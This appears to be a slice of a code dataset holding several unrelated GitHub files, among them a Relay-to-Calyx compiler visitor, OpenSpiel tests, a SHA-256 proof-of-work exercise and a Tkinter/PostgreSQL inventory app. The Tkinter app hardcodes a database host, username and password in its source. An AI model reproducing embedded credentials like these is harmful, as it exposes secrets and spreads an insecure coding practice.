args=value.args,\n attributes=value.attrs,\n data_type=ru.get_dahlia_data_type(type_annotation),\n component=comp_inst,\n )\n self.func_defs.append(dahlia_func_def)\n if root_name in self.func_def_map:\n self.func_def_map[root_name].append(dahlia_func_def)\n else:\n self.func_def_map[root_name] = [dahlia_func_def]\n\n else:\n assert 0, f\"{value} is not supported yet.\"\n\n def visit_let(self, let):\n \"\"\"Visits a `let` statement in the following manner:\n 1. Visit the `value`.\n 2. Visit the `var`, or destination.\n 3. Return the `body`.\n \"\"\"\n # Check if the dest is a tuple\n if isinstance(let.var.type_annotation, tvm.ir.type.TupleType):\n value = self.visit(let.value)\n # Handles cases such as: `%x13 = (%x9, %x12)`, where %x9 and %x12 will\n # evaluate to cells\n assert isinstance(value, list) and len(value) == len(\n let.var.type_annotation.fields\n ), \"Currently, if let destination is a tuple, can only handle 'tuple forwarding' situations\"\n unnested_values = []\n # need to do this bc visit_var now returns a list\n for dest in value:\n assert isinstance(dest, list) and isinstance(\n dest[0], Cell\n ), \"Tuples in let value must evaluate to cells\"\n unnested_values.append(dest[0])\n # doesn't do anything, just increments the id by 1 so that we can\n # compare the names in the generated Calyx/Dahlia files with the\n # TVM relay more easily.\n self.id(let.var.name_hint)\n # don't need to create new cells, just map the var to the cells in value\n self.tuple_dic[let.var] = unnested_values\n else:\n value = self.visit(let.value)\n dest = self.visit(let.var)\n # need to pass dest[0] bc visit_var returns a list\n self.analyze_val_dest(let, value, dest[0], let.var.type_annotation)\n return self.visit(let.body)\n\n def visit_tuple(self, tup) -> list:\n \"\"\"\n For visiting tuple. Just recursively visits each element in the tuple.\n \"\"\"\n return [self.visit(x) for x in tup.fields]\n\n def visit_constant(self, const) -> tvm.relay.Constant:\n \"\"\"Simply returns the Relay constant. 
Since we don't\n have the variable id here, we generate the Calyx\n cell within the `let` visit.\"\"\"\n return const\n\n def visit_call(self, call) -> tvm.relay.Call:\n \"\"\"The Relay call consists of 3 main pieces:\n call.op, call.args, and call.attrs. The\n latter two are used within call.op.\n\n call.op is mapped to a corresponding Dahlia function,\n and subsequently lowered to Calyx as a component to\n be invoked.\n \"\"\"\n # Visit the call arguments.\n call.args = [self.visit(a) for a in call.args]\n # dealing w/ the fact that visit_var returns list\n call.args = flatten_lst(call.args)\n return call\n\n def visit_function(self, function):\n \"\"\"Visits the function. Returns the `main`\n component, as well as a list of Dahlia\n function definitions.\"\"\"\n for p in function.params:\n self.visit(p)\n\n self.visit(function.body)\n\n return (\n Component(\n name=\"main\",\n inputs=[],\n outputs=[],\n structs=self.wires + list(self.id_to_cell.values()),\n controls=SeqComp(self.controls),\n ),\n self.func_defs,\n )\n\n\ndef flatten_lst(lst):\n \"\"\"\n Because evaluating a variable sometimes returns a tuple, the return type of\n visit_var() is a list. So when we evaluate a list of variables, we get a\n list of lists back. This function will return a flattened version of\n its input list.\n Precondition: the only elements in lst should be cells and/or lists of\n cells\n \"\"\"\n flat = []\n for elt in lst:\n if isinstance(elt, Cell):\n flat.append(elt)\n elif isinstance(elt, list):\n for sub_elt in elt:\n flat.append(sub_elt)\n else:\n assert 0, \"Args must evaluate to a Cell\"\n return flat\n\n\ndef relay_transforms(mod) -> Function:\n \"\"\"https://tvm.apache.org/docs/api/python/relay/transform.html\"\"\"\n transforms = tvm.transform.Sequential(\n [\n relay.transform.SimplifyExpr(),\n relay.transform.SimplifyInference(),\n ]\n )\n if isinstance(mod, relay.Function):\n mod = tvm.IRModule.from_expr(mod)\n mod = transforms(mod)\n\n return mod[\"main\"]\n\n\ndef check_naming_convention(func_defs: List[ru.DahliaFuncDef]):\n \"\"\"Names that begin with the prefix `__` are reserved for\n the Dahlia programs that are created to implement the\n respective Relay call nodes. For example, `__x` is\n not allowed, but `_x` and `x` are OK.\n \"\"\"\n\n def is_reserved(x):\n return x[:2] == \"__\"\n\n for f in func_defs:\n variables = [v.id.name for v in f.args + [f.dest]]\n reserved_variables = list(filter(is_reserved, variables))\n if reserved_variables:\n raise Exception(\n f\"Relay call node: `{f.function_id}` violates the naming convention. No \"\n \"variables should be prefixed with `__`. This is reserved for Dahlia \"\n \"local variables used before lowering to Calyx. Offending variable name(s): \"\n f\"{', '.join(reserved_variables)}\"\n )\n\n\ndef emit_calyx(relay_ir, save_mem=True) -> (str, Program):\n \"\"\"Lowers a Relay function to a Calyx program.\"\"\"\n relay_ir = relay_transforms(relay_ir)\n visitor = Relay2Calyx()\n main, func_defs = visitor.visit(relay_ir)\n check_naming_convention(func_defs)\n\n return (\n emit_components(func_defs, save_mem),\n Program(\n imports=[\n # Manually printed because we need to print the Dahlia\n # function definitions\n ],\n components=[main],\n meta=visitor.source_map,\n ),\n )\n\n\ndef get_program_dat_memories(relay_ir):\n \"\"\"Returns a mapping (id -> tensor size)\n for each memory in the Relay IR. 
The format\n explicitly follows the `dat` format; this\n is used for Calyx simulation.\"\"\"\n visitor = Relay2Calyx()\n relay_ir = relay_transforms(relay_ir)\n _, func_defs = visitor.visit(relay_ir)\n\n memories = {}\n for id, shape in visitor.id_to_shape.items():\n if id in visitor.mem_data.keys():\n memories[id] = {\n \"data\": visitor.mem_data[id].tolist(),\n \"format\": {\n \"numeric_type\": \"fixed_point\",\n \"is_signed\": True,\n \"width\": 32,\n \"frac_width\": 16,\n },\n }\n else:\n memories[id] = {\n \"data\": np.zeros(shape).tolist(),\n \"format\": {\n \"numeric_type\": \"fixed_point\",\n \"is_signed\": True,\n \"width\": 32,\n \"frac_width\": 16,\n },\n }\n\n return memories\n\n\nif __name__ == \"__main__\":\n import argparse\n\n parser = argparse.ArgumentParser(description=\"Lower Relay IR to Calyx.\")\n parser.add_argument(\"file\", help=\"Path to the Relay IR.\")\n parser.add_argument(\n \"-s\",\n \"--save_mem\",\n required=False,\n help=\"boolean to determine whether you want the Calyx design to use less memory\",\n )\n\n args = parser.parse_args()\n if args.file is None:\n raise Exception(\n \"The TVM Relay visitor requires a file containing the Relay IR.\"\n )\n\n with open(args.file, \"r\") as file:\n relay_ir = file.read()\n assert (\n '#[version = \"0.0.5\"]' in relay_ir\n ), 'TVM requires #[version = \"0.0.5\"] at the top of the Relay IR file.'\n\n relay_ir = tvm.parser.fromtext(relay_ir)\n\n imports = [\n Import(\"primitives/core.futil\"),\n Import(\"primitives/memories.futil\"),\n Import(\"primitives/binary_operators.futil\"),\n Import(\"primitives/math.futil\"),\n ]\n\n # save_mem is an optional argument. If the user doesn't specify, we\n # want the default to be save_mem = true\n save_mem = (\n args.save_mem == \"true\" or args.save_mem == \"True\" or args.save_mem is None\n )\n\n (dahlia_defs, prog) = emit_calyx(relay_ir, save_mem)\n for imp in imports:\n print(imp.doc())\n print(dahlia_defs)\n print(prog.doc())\n","repo_name":"cucapra/calyx","sub_path":"frontends/relay/relay_visitor.py","file_name":"relay_visitor.py","file_ext":"py","file_size_in_byte":20696,"program_lang":"python","lang":"en","doc_type":"code","stars":347,"dataset":"github-code","pt":"37"} +{"seq_id":"17088807015","text":"#User function Template for python3\n\nclass Solution:\n \n #Function to return a list containing the DFS traversal of the graph.\n def dfsOfGraph(self, V, graph):\n def dfs(node):\n nonlocal visited, ans\n ans.append(node)\n \n for nei in graph[node]:\n if nei not in visited:\n visited.add(nei)\n dfs(nei)\n \n # print(graph)\n ans = []\n visited = set()\n visited.add(0)\n dfs(0)\n return ans\n\n\n#{ \n # Driver Code Starts\nif __name__ == '__main__':\n T=int(input())\n while T>0:\n V,E=map(int,input().split())\n adj=[[] for i in range(V+1)]\n for i in range(E):\n u,v=map(int,input().split())\n adj[u].append(v)\n adj[v].append(u)\n ob=Solution()\n ans=ob.dfsOfGraph(V,adj)\n for i in range(len(ans)):\n print(ans[i],end=\" \")\n print()\n T-=1\n# } Driver Code Ends","repo_name":"mrprashantkumar/LeetCode-Submissions-Python","sub_path":"DFS of Graph - GFG/dfs-of-graph.py","file_name":"dfs-of-graph.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"2636553279","text":"import numpy as np\nfrom game.constants import *\n\n\nclass Grid:\n\n INT_MAX = 10000\n\n def __init__(self):\n\n self.desc = \"This object is used to do math with vectors.\"\n\n self.width = SCREEN_WIDTH // TILESIZE\n 
self.height = SCREEN_HEIGHT // TILESIZE\n self.depth = 2*self.height # using y as z\n #layer v2 [y overlap][x screen][y screen]\n self.layers = np.empty((self.width, self.height,\n self.depth, 2),\n np.float32)\n self.layers[:] = np.nan\n\n def poly_check(self, points, p):\n\n ax, ay, bx, by, cx, cy, dx, dy = points[0][0], points[0][1], \\\n points[1][0], points[1][1], \\\n points[2][0], points[2][1], \\\n points[3][0], points[3][1]\n px, py = p[0], p[1]\n nx = bx - ax\n ny = by - ay\n edge = (px - ax) * ny + (py - ay) * (-nx)\n if (edge > 240):\n return False\n else:\n nx = cx - bx\n ny = cy - by\n edge = (px - bx) * ny + (py - by) * (-nx)\n\n if (edge > 240):\n return False\n else:\n nx = dx - cx\n ny = dy - cy\n edge = (px - cx) * ny + (py - cy) * (-nx)\n\n if (edge > 240):\n return False\n else:\n nx = ax - dx\n ny = ay - dy\n edge = (px - dx) * ny + (py - dy) * (-nx)\n\n if (edge > 240):\n return False\n else:\n return True\n\n def twodimensionalsum(self, p1, p2):\n \"\"\"given (a,b) and (c,d) return (a+c, b+d)\"\"\"\n return (p1[0] + p2[0], p1[1] + p2[1])\n\n def round_num(self, number, roundby=None):\n \"\"\"if roundby is none default to TILESIZE constant\"\"\"\n if not roundby:\n return TILESIZE * (number // TILESIZE)\n else:\n return roundby * (number // roundby)\n\n def rounder(self, number, roundby=None):\n \"\"\"same as round_num but no scalar if rounder is none default to TILESIZE constant\"\"\"\n if not roundby:\n return (number // TILESIZE)\n else:\n return (number // roundby)\n\n def is_nan(self, tilex, tiley, tilez = None):\n \"\"\"check if self.layers has any nan values starting at bone layer\"\"\"\n if tilez is None:\n if np.isnan(self.layers[tilex][tiley][tiley][0]):\n return True\n else:\n if np.isnan(self.layers[tilex][tiley][tilez][0]):\n return True\n\n return False\n def curr_tile(self, tilex, tiley, adj = \"none\"):\n \"\"\"return the current tile at tilex, tiley using curr overlap (bone\n behind screen)\"\"\"\n depth_counter = 0\n for i in range(tiley + 1, self.depth):\n if not np.isnan(self.layers[tilex][tiley][i][0]):\n depth_counter += 1\n\n return depth_counter","repo_name":"Shubin123/tile-editor","sub_path":"game/vector.py","file_name":"vector.py","file_ext":"py","file_size_in_byte":2957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31791031446","text":"import logging\r\n\r\n# Function to iterate through the list and check ages \r\ndef validate_age_data(ages):\r\n for value in ages:\r\n if value <= 0: \r\n logger.error('Invalid age')\r\n elif value < 18:\r\n logger.debug('teenager')\r\n else: \r\n logger.debug('adult')\r\n\r\n\r\nif __name__ == '__main__':\r\n # Defining the structure of error message\r\n error_message_format = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\r\n \r\n # Setting up the basic configuration\r\n logging.basicConfig(filename = 'age_log.log', format = error_message_format, filemode = 'a')\r\n \r\n # Defining the logger object\r\n # Name can be given a logger object by passing as an argument, otherwise it takes the name as root\r\n logger = logging.getLogger('upGrad')\r\n \r\n # Set the level(Here we will set the level to DEBUG(10))\r\n # so that it can log itself and all other levels(INFO(20), WARNING(30) etc)\r\n logger.setLevel(logging.DEBUG)\r\n\r\n # Example_1:\r\n ages = [12, 22, 33, -6, 0, 15]\r\n validate_age_data(ages)\r\n \r\n # Example_2:\r\n ages = [12, 32, -55, 11, 61, 33]\r\n 
validate_age_data(ages)\r\n","repo_name":"sreegithub19/upgrad","sub_path":"2_Course_continuation/_4_MLOps/_3_Session_4_Solutions/Q.2 Logging/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"7357815408","text":"from PIL import Image, ImageChops, ImageDraw, ImageFont\nimg = Image.open('img/1.jpg')\n# 切换图片模式\nimg = img.convert('RGBA')\n# 创建一个背景完全透明的图片模板,大小和原始图片一样大\n\nw, h = img.size\n\nnew_img = Image.new('RGBA', (w, h), (0, 0, 0, 0))\n\n# 使用ImageDraw生成一个画笔\n# 此过程需要用户提前指定需要操作的图片\n\ndraw_1 = ImageDraw.Draw(new_img)\n# 绘制文字\n# 使用imageFont生成对应的字体\nfont = ImageFont.truetype('img/111.ttf', 50)\n\ndraw_1.text((100, 300), '啦啦啦啦啦', font=font, fill=(100, 101, 100))\n\nnew_img = new_img.rotate(45)\n# 设置new_img向左下角移动\nnew_img = ImageChops.offset(new_img, -30, 30)\n# new_img.show()\n# 将文字和图片进行合并\ncombine_img = Image.alpha_composite(img, new_img)\ncombine_img.show()\n# 图片保存\ncombine_img = combine_img.convert('RGB')\ncombine_img.save('kkk.jpg')\n\n","repo_name":"yunyusha/xunxibiji","sub_path":"month1/week2/class5/pillow5.py","file_name":"pillow5.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21312362471","text":"#!/usr/bin/python3\n\n\ndef only_diff_elements(set_1, set_2):\n\n \"\"\"\n returns all elements present in only one set\n \"\"\"\n\n one_set = set()\n for element in set_1:\n if element not in set_2:\n one_set.add(element)\n for element in set_2:\n if element not in set_1:\n one_set.add(element)\n return one_set\n","repo_name":"Lesuuda/alx-higher_level_programming","sub_path":"0x04-python-more_data_structures/4-only_diff_elements.py","file_name":"4-only_diff_elements.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3276342807","text":"#!/usr/bin/env python\n\nfrom google.appengine.ext import ndb\n\nfrom lib.utils import BaseModel\nimport jsonschema\n\n\nclass TodoList(BaseModel):\n def validate_items(prop, value):\n if value is not None:\n schema = {\n \"type\": \"array\",\n \"items\": {\n \"type\": \"object\",\n \"properties\": {\n \"completed\": {\"type\": \"boolean\"},\n \"description\": {\"type\": \"string\"}\n }\n }\n }\n jsonschema.validate(value, schema)\n\n name = ndb.StringProperty(required=True, indexed=False)\n items = ndb.JsonProperty(indexed=False, validator=validate_items)\n users = ndb.KeyProperty(kind='User', repeated=True)\n","repo_name":"jmuia/todo-plus-friends-service","sub_path":"model/todo_list.py","file_name":"todo_list.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2506134097","text":"c = input(''); a = input(''); b = input('')\r\ni = 0\r\nwhile a in c:\r\n if a in b:\r\n print('Impossible')\r\n break\r\n else:\r\n c = c.replace(a, b)\r\n i += 1\r\nelse: print(i)\r\n\r\n","repo_name":"vasyanch/stepik","sub_path":"Python_base_apply/Stepic_3mod_changestrings.py","file_name":"Stepic_3mod_changestrings.py","file_ext":"py","file_size_in_byte":201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11039852438","text":"from django.urls import path\nfrom customer.api_views import CreateUserView, CreateCustomerProfileView,\\\n CustomerProfileUpdateDetailٰView\nfrom 
rest_framework_simplejwt.views import (\n TokenObtainPairView,\n TokenRefreshView,\n)\n\napp_name = 'customer_api'\nurlpatterns = [\n path('login/', TokenObtainPairView.as_view(), name='token_obtain_pair'),\n path('token/refresh/', TokenRefreshView.as_view(), name='token_refresh'),\n path('register/',\n CreateUserView.as_view(), name='register'),\n path('profile/',\n CreateCustomerProfileView.as_view(), name='create_profile'),\n path('profile_customer/',\n CustomerProfileUpdateDetailٰView.as_view(), name='profile'),\n\n]\n","repo_name":"AliArefi1993/My-shop-Django","sub_path":"myshop/customer/api_urls.py","file_name":"api_urls.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72379865707","text":"import itertools\n\nfrom absl.testing import absltest\nfrom absl.testing import parameterized\nimport numpy as np\nimport torch\n\nfrom open_spiel.python import rl_environment\nfrom open_spiel.python.algorithms import exploitability\nfrom open_spiel.python.examples import kuhn_policy_gradient\nimport pyspiel\nfrom open_spiel.python.pytorch import policy_gradient\nfrom open_spiel.python.pytorch.losses import rl_losses\n\nSEED = 24984617\n\n\nclass PolicyGradientTest(parameterized.TestCase, absltest.TestCase):\n\n @parameterized.parameters(\n itertools.product((\"rpg\", \"qpg\", \"rm\", \"a2c\", \"neurd\"),\n (\"kuhn_poker\", \"leduc_poker\")))\n def test_run_game(self, loss_str, game_name):\n env = rl_environment.Environment(game_name)\n env.seed(SEED)\n info_state_size = env.observation_spec()[\"info_state\"][0]\n num_actions = env.action_spec()[\"num_actions\"]\n\n agents = [\n policy_gradient.PolicyGradient( # pylint: disable=g-complex-comprehension\n player_id=player_id,\n info_state_size=info_state_size,\n num_actions=num_actions,\n loss_str=loss_str,\n hidden_layers_sizes=[32, 32],\n batch_size=16,\n entropy_cost=0.001,\n critic_learning_rate=0.01,\n pi_learning_rate=0.01,\n num_critic_before_pi=4) for player_id in [0, 1]\n ]\n\n for _ in range(2):\n time_step = env.reset()\n while not time_step.last():\n current_player = time_step.observations[\"current_player\"]\n current_agent = agents[current_player]\n agent_output = current_agent.step(time_step)\n time_step = env.step([agent_output.action])\n\n for agent in agents:\n agent.step(time_step)\n\n def test_neurd_kuhn(self):\n env = rl_environment.Environment(\"kuhn_poker\")\n env.seed(SEED)\n info_state_size = env.observation_spec()[\"info_state\"][0]\n num_actions = env.action_spec()[\"num_actions\"]\n\n agents = [\n policy_gradient.PolicyGradient( # pylint: disable=g-complex-comprehension\n player_id=player_id,\n info_state_size=info_state_size,\n num_actions=num_actions,\n loss_str=\"neurd\",\n hidden_layers_sizes=[32],\n batch_size=16,\n entropy_cost=0.001,\n critic_learning_rate=0.01,\n pi_learning_rate=0.01,\n num_critic_before_pi=4) for player_id in [0, 1]\n ]\n expl_policies_avg = kuhn_policy_gradient.PolicyGradientPolicies(env, agents)\n\n for _ in range(100):\n time_step = env.reset()\n while not time_step.last():\n current_player = time_step.observations[\"current_player\"]\n current_agent = agents[current_player]\n agent_output = current_agent.step(time_step)\n time_step = env.step([agent_output.action])\n\n for agent in agents:\n agent.step(time_step)\n\n expl = exploitability.exploitability(env.game, expl_policies_avg)\n # Check the exploitability is less than the target upper bound.\n self.assertLess(expl, 0.7)\n\n def 
test_run_hanabi(self):\n # Hanabi is an optional game, so check we have it before running the test.\n game = \"hanabi\"\n if game not in pyspiel.registered_names():\n return\n\n num_players = 3\n env_configs = {\n \"players\": num_players,\n \"max_life_tokens\": 1,\n \"colors\": 2,\n \"ranks\": 3,\n \"hand_size\": 2,\n \"max_information_tokens\": 3,\n \"discount\": 0.99\n }\n env = rl_environment.Environment(game, **env_configs)\n env.seed(SEED)\n info_state_size = env.observation_spec()[\"info_state\"][0]\n num_actions = env.action_spec()[\"num_actions\"]\n\n agents = [\n policy_gradient.PolicyGradient( # pylint: disable=g-complex-comprehension\n player_id=player_id,\n info_state_size=info_state_size,\n num_actions=num_actions,\n hidden_layers_sizes=[8, 8],\n batch_size=16,\n entropy_cost=0.001,\n critic_learning_rate=0.001,\n pi_learning_rate=0.001,\n num_critic_before_pi=4) for player_id in range(num_players)\n ]\n\n time_step = env.reset()\n while not time_step.last():\n current_player = time_step.observations[\"current_player\"]\n agent_output = [agent.step(time_step) for agent in agents]\n time_step = env.step([agent_output[current_player].action])\n\n for agent in agents:\n agent.step(time_step)\n\n def test_loss_modes(self):\n loss_dict = {\n \"qpg\": rl_losses.BatchQPGLoss,\n \"rpg\": rl_losses.BatchRPGLoss,\n \"rm\": rl_losses.BatchRMLoss,\n \"a2c\": rl_losses.BatchA2CLoss,\n \"neurd\": rl_losses.BatchNeuRDLoss,\n }\n\n for loss_str, loss_class in loss_dict.items():\n agent_by_str = policy_gradient.PolicyGradient(\n player_id=0,\n info_state_size=32,\n num_actions=2,\n loss_str=loss_str,\n loss_class=None)\n agent_by_class = policy_gradient.PolicyGradient(\n player_id=0,\n info_state_size=32,\n num_actions=2,\n loss_str=None,\n loss_class=loss_class)\n\n self.assertEqual(agent_by_str._loss_class, agent_by_class._loss_class)\n\n\nif __name__ == \"__main__\":\n np.random.seed(SEED)\n torch.manual_seed(SEED)\n absltest.main()\n","repo_name":"deepmind/open_spiel","sub_path":"open_spiel/python/pytorch/policy_gradient_pytorch_test.py","file_name":"policy_gradient_pytorch_test.py","file_ext":"py","file_size_in_byte":5281,"program_lang":"python","lang":"en","doc_type":"code","stars":3700,"dataset":"github-code","pt":"37"} +{"seq_id":"3558061192","text":"#!/usr/bin/env python\n\nfrom setuptools import setup, find_packages\n\nimport fancyunittest\n\ntry:\n description = open('README.md').read()\nexcept:\n description = __doc__\n\nscripts = {\n 'console_scripts': ['fancyunittest = fancyunittest.main:main']\n}\n\nsetup(name='fancyunittest',\n version=fancyunittest.__version__,\n description=\"Python's unittest extension to colorize its output.\",\n long_description=description,\n license='New BSD License',\n author='Anler',\n author_email='anler86@gmail.com',\n url='https://github.com/ikame/Fancy-Unittest',\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Developers',\n 'Environment :: Console',\n 'Operating System :: Unix',\n 'License :: OSI Approved :: BSD License',\n 'Programming Language :: Python',\n 'Topic :: Software Development',\n 'Topic :: Software Development :: Testing',\n ],\n keywords=\"unittest colorize visualize output\",\n packages=find_packages(),\n entry_points=scripts)\n","repo_name":"anler/Fancy-Unittest","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"12065737577","text":"import hashlib\r\nimport 
random\r\nimport time\r\n\r\ndef generar_resumenSHA256_fichero(nombre_fichero):\r\n\r\n sha256 = hashlib.sha256()\r\n with open(nombre_fichero, \"rb\") as archivo:\r\n bloque = archivo.read()\r\n # Actualiza el objeto SHA-256 con el contenido del bloque\r\n sha256.update(bloque)\r\n\r\n # Devuelve el resumen SHA-256 como una cadena hexadecimal\r\n return sha256.hexdigest()\r\n\r\ndef generar_secuencia_identificador(estudiante_id):\r\n # Genera una secuencia de 8 caracteres en hexadecimal\r\n secuencia_hex = ''.join(random.choice('abcdef0123456789') for _ in range(8))\r\n \r\n # Genera la línea con la secuencia hexadecimal, el identificador público y 100\r\n linea = f\"{secuencia_hex}\\t{estudiante_id}\\t100\"\r\n return linea\r\n\r\ndef crear_archivo_modificado(archivo_entrada, archivo_salida, estudiante_id):\r\n \r\n with open(archivo_entrada, \"r\") as entrada:\r\n # Lee el contenido completo del archivo de entrada\r\n contenido_entrada = entrada.read()\r\n\r\n start_time = time.time()\r\n max_ceros_resumen = None\r\n resumen_almacenado = None\r\n\r\n while time.time() - start_time < 60:\r\n # Genera una cadena aleatoria y calcula su resumen SHA-256\r\n cadena_aleatoria = ''.join(random.choices('0123456789abcdef', k=32)) + contenido_entrada\r\n resumen = hashlib.sha256(cadena_aleatoria.encode()).hexdigest()\r\n\r\n long_prefijo_ceros = len(resumen) - len(resumen.lstrip('0'))\r\n\r\n # Verifica si el resumen comienza con un prefijo de ceros más largo que el máximo encontrado hasta ahora\r\n if resumen_almacenado is None or long_prefijo_ceros > max_ceros_resumen:\r\n max_ceros_resumen = long_prefijo_ceros\r\n resumen_almacenado = resumen\r\n\r\n if max_ceros_resumen is not None and resumen_almacenado:\r\n # Abre el archivo de salida en modo escritura\r\n print(\"Resumen con secuencia mas larga de ceros obtenida en el tiempo de computación previsto: \" + resumen_almacenado)\r\n with open(archivo_salida, \"w\") as salida:\r\n # Escribe el contenido del archivo de entrada en el archivo de salida\r\n salida.write(contenido_entrada)\r\n\r\n # Escribe la línea adicional con la secuencia y el resumen SHA-256 con el mayor prefijo de ceros\r\n secuencia_identificador = generar_secuencia_identificador(estudiante_id)\r\n salida.write(\"\\n\" + secuencia_identificador)\r\n else:\r\n print(\"No se encontró un resumen que cumpla con los criterios en un minuto.\")\r\n\r\ndef comprobar_condiciones(archivo1, archivo2, estudiante_id):\r\n # Leer el contenido del primer archivo\r\n with open(archivo1, \"r\") as file1:\r\n contenido1 = file1.read()\r\n\r\n # Leer el contenido del segundo archivo\r\n with open(archivo2, \"r\") as file2:\r\n contenido2 = file2.read()\r\n\r\n # Verificar si el contenido de archivo2 comienza con el contenido de archivo1\r\n if contenido2.startswith(contenido1):\r\n print(\"El segundo archivo comienza con el mismo contenido que el primero.\")\r\n\r\n # Extraer la línea adicional del segundo archivo\r\n lineas_archivo2 = contenido2.split('\\n')\r\n if len(lineas_archivo2) > 1:\r\n linea_adicional = lineas_archivo2[-1] # Suponemos que la línea adicional es la segunda línea\r\n\r\n # Dividir la línea adicional en sus partes\r\n partes = linea_adicional.split('\\t')\r\n if len(partes) == 3:\r\n secuencia_hexadecimal, id, cien = partes\r\n\r\n # Verificar que la secuencia hexadecimal tenga 8 caracteres\r\n if len(secuencia_hexadecimal) == 8 and all(c in \"0123456789abcdefABCDEF\" for c in secuencia_hexadecimal):\r\n # Verificar que el ID, el número 100 y el resumen SHA-256 estén 
presentes en sus posiciones correspondientes\r\n if id == estudiante_id and cien == \"100\":\r\n # Calcular el resumen SHA-256 del contenido del segundo archivo\r\n resumen_archivo2 = hashlib.sha256(contenido2.encode()).hexdigest()\r\n # Verificar si el resumen_archivo2 comienza con una secuencia de 0's\r\n if resumen_archivo2.startswith(\"00\"):\r\n print(\"La línea adicional cumple con las condiciones y el resumen SHA-256 tiene un prefijo de 0's.\")\r\n else:\r\n print(\"La línea adicional cumple con las condiciones, pero el resumen SHA-256 no tiene un prefijo de 0's.\")\r\n else:\r\n print(\"La línea adicional no cumple con las condiciones especificadas.\")\r\n else:\r\n print(\"La secuencia hexadecimal no tiene 8 caracteres.\")\r\n else:\r\n print(\"La línea adicional no tiene el formato esperado.\")\r\n else:\r\n print(\"El segundo archivo no contiene una línea adicional.\")\r\n else:\r\n print(\"El segundo archivo no comienza con el mismo contenido que el primero.\")\r\n\r\n\r\n\r\n#CODIGO DE EXPERIMENTACION\r\ncrear_archivo_modificado(\"SGSSI-23.CB.03.txt\", \"SGSSI-23.CB.03.4e.txt\", \"4e\")\r\ncomprobar_condiciones(\"SGSSI-23.CB.02.txt\", \"SGSSI-23.CB.02_modificado.txt\", \"4e\")\r\n","repo_name":"Mikeloon/SGSSI-23_LABS_MLON","sub_path":"Lab05_SGSSI.py","file_name":"Lab05_SGSSI.py","file_ext":"py","file_size_in_byte":5253,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23146288896","text":"import tkinter as tk\r\n#from tkinter import ttk, messagebox\r\nimport ttkbootstrap as ttk\r\nfrom ttkbootstrap import Style, Notebook\r\nfrom tkinter import messagebox\r\nimport psycopg2\r\nfrom PIL import Image, ImageTk\r\nimport matplotlib.pyplot as plt\r\n\r\n'''\r\n NOTA: ComboBox_Query1 se llama ComboBox pero es una Query fija, Se mantiene asi por orden.\r\n \r\n NOTA: Hay un elemento de 'tk.entry', Esta comentado, pero se mantiene por conveniencia.\r\n \r\n \r\n NO SE SABE:\r\n - Hay que hacer login dentro del programa en vez de poner datos de psycopg en codigo ??\r\n \r\n \r\n TODO:\r\n # TAB 3 Registros -->\r\n *** Por ahora funciona sobre la tabla 'test_registros' -- CAMBIAR a tablas reales.\r\n NOTA: Consultar con equipo si las funciones de registros estan listas o falta agregar algo. \r\n \r\n TODO Maxima prioridad: Nombre de tablas: Esperar a ver que hace marco con los nombres de las tablas.\r\n \r\n \r\n \r\n'''\r\n\r\n\r\n\r\n# Configuracion de psycop CONNECT con PostgresSQL\r\nconnection = psycopg2.connect(\r\n host=\"10.4.3.195\", # PUERTO 5432\r\n database=\"instrumentos\",\r\n user=\"instrumentos_dev\", # Temporal! - Cambiar a 'instrumento'\r\n password=\"5jaLgi6\"\r\n)\r\n\r\n# Crea cursor para hacer las consultas\r\ncrsr = connection.cursor()\r\n\r\n# Elementos U.I. de programa. ---->\r\n\r\n\r\n#root = ttk.Window(themename = 'yeti') # Tema claro\r\nroot = ttk.Window(themename = 'superhero') # temas oscuros: superhero, Darkly, Vapor\r\nroot.geometry(\"550x440\") # Tamano ventana fijo -> Con linea siguiente no es necesario. Se comenta\r\nroot.resizable(False, False) # Hace ventana no modificable. 
Ahorra hacerla dinamica.\r\nroot.title(\"Base de Datos Instrumentos\")\r\n\r\n\r\n\r\n# Creacion NOTEBOOK TABS \r\n\r\n# Crea un ttkbootstrap notebook, y agrega a ventana principal\r\nnotebook = Notebook(root, style=\"primary.TNotebook\")\r\n#notebook.pack(fill=\"both\", expand=True)\r\nnotebook.grid(row=0, column=0, padx=10, pady=10, sticky=\"nsew\")\r\n\r\n# crea tabs para notebook\r\ntab1 = tk.Frame(notebook)\r\ntab2 = tk.Frame(notebook)\r\ntab3 = tk.Frame(notebook)\r\ntab4 = tk.Frame(notebook)\r\ntab5 = tk.Frame(notebook)\r\n\r\n# agrega las tabs al notebook\r\nnotebook.add(tab1, text=\"Inicio\")\r\nnotebook.add(tab2, text=\"Consultas Rapidas\")\r\nnotebook.add(tab4, text=\"Consultas Inventario\")\r\nnotebook.add(tab5, text=\"Visualizacion\")\r\nnotebook.add(tab3, text=\"REGISTROS\")\r\n\r\n\r\n# Muestra resultados en una nueva ventana resultado. (usa treeview)\r\ndef display_results_in_window(results):\r\n # Create a new window to display the results\r\n result_window = tk.Toplevel(root)\r\n result_window.title(\"Resultado Consulta\")\r\n\r\n # Create a treeview widget to display the results\r\n result_tree = ttk.Treeview(result_window, show=\"headings\")\r\n result_tree.grid(row=0, 